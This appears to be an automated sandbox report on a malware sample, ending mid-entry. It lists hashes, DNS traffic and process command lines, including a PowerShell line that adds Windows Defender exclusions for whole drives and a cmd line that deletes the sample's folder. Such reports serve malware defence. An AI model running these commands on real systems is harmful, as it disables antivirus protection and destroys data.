| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
| MD5 | 907c1e4e19a50fff3ac19087ebe04295 |
| SHA1 | 699187f7bfb7e65d05d445b46f9583c77f519c0e |
| SHA256 | 115c37d38945ee56b0e7a23cf90c60f63191aaf312c207c8ac5ab719a1500158 |
| SHA512 | 5da0d6b688c09d926881512f698ec8d205c08c37eb51f2a18471aa3f99aeb7a771030c170ea933cc67f17852a433359ce9c51fcfcff780cb6d35d78d0eb5e9c7 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
157s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x470
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| NL | 52.111.243.29:443 | tcp | |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hympvelh.yk0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3636-9-0x00000207664D0000-0x00000207664F2000-memory.dmp
memory/3636-10-0x00007FFA6A780000-0x00007FFA6B241000-memory.dmp
memory/3636-11-0x00000207641B0000-0x00000207641C0000-memory.dmp
memory/3636-12-0x00000207641B0000-0x00000207641C0000-memory.dmp
memory/3636-15-0x00007FFA6A780000-0x00007FFA6B241000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
117s
Max time network
128s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
Files
memory/2588-5-0x000000001B660000-0x000000001B942000-memory.dmp
memory/2588-4-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/2588-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/2588-7-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-6-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2588-9-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-10-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-11-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-12-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-13-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
133s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
Network
Files
memory/2204-4-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2204-6-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2204-7-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-5-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2204-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2204-9-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-10-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-11-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-12-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-13-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
129s
Max time network
174s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
157s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4c0 0x150
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04yth2lh.33g.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2204-10-0x0000029B69E70000-0x0000029B69E92000-memory.dmp
memory/2204-11-0x0000029B69F40000-0x0000029B69F50000-memory.dmp
memory/2204-9-0x00007FFDF9A00000-0x00007FFDFA4C1000-memory.dmp
memory/2204-12-0x0000029B69F40000-0x0000029B69F50000-memory.dmp
memory/2204-13-0x0000029B69F40000-0x0000029B69F50000-memory.dmp
memory/2204-16-0x00007FFDF9A00000-0x00007FFDFA4C1000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:29
Platform
win10v2004-20240226-en
Max time kernel
109s
Max time network
439s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 1016 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 1016 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 1016 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2188 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2188 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
Files
memory/1016-1-0x0000000072C10000-0x00000000733C0000-memory.dmp
memory/1016-0-0x0000000005420000-0x0000000005456000-memory.dmp
memory/1016-3-0x0000000005550000-0x0000000005560000-memory.dmp
memory/1016-2-0x0000000005550000-0x0000000005560000-memory.dmp
memory/1016-4-0x0000000005B90000-0x00000000061B8000-memory.dmp
memory/1016-5-0x0000000005B20000-0x0000000005B42000-memory.dmp
memory/1016-6-0x00000000062C0000-0x0000000006326000-memory.dmp
memory/1016-7-0x00000000063A0000-0x0000000006406000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ebnrarrs.bxr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1016-17-0x00000000065E0000-0x0000000006934000-memory.dmp
memory/1016-18-0x00000000069E0000-0x00000000069FE000-memory.dmp
memory/1016-19-0x0000000006A30000-0x0000000006A7C000-memory.dmp
memory/1016-20-0x0000000005550000-0x0000000005560000-memory.dmp
memory/1016-21-0x000000007F680000-0x000000007F690000-memory.dmp
memory/1016-22-0x0000000006FB0000-0x0000000006FE2000-memory.dmp
memory/1016-23-0x000000006F550000-0x000000006F59C000-memory.dmp
memory/1016-33-0x0000000006F90000-0x0000000006FAE000-memory.dmp
memory/1016-34-0x0000000007BC0000-0x0000000007C63000-memory.dmp
memory/1016-35-0x0000000008350000-0x00000000089CA000-memory.dmp
memory/1016-36-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/1016-37-0x0000000007D70000-0x0000000007D7A000-memory.dmp
memory/1016-38-0x0000000007FC0000-0x0000000008056000-memory.dmp
memory/1016-39-0x0000000007EF0000-0x0000000007F01000-memory.dmp
memory/1016-40-0x0000000007F30000-0x0000000007F3E000-memory.dmp
memory/1016-41-0x0000000007F60000-0x0000000007F74000-memory.dmp
memory/1016-42-0x0000000007FA0000-0x0000000007FBA000-memory.dmp
memory/1016-43-0x0000000007F90000-0x0000000007F98000-memory.dmp
memory/1016-46-0x0000000072C10000-0x00000000733C0000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
89s
Max time network
216s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
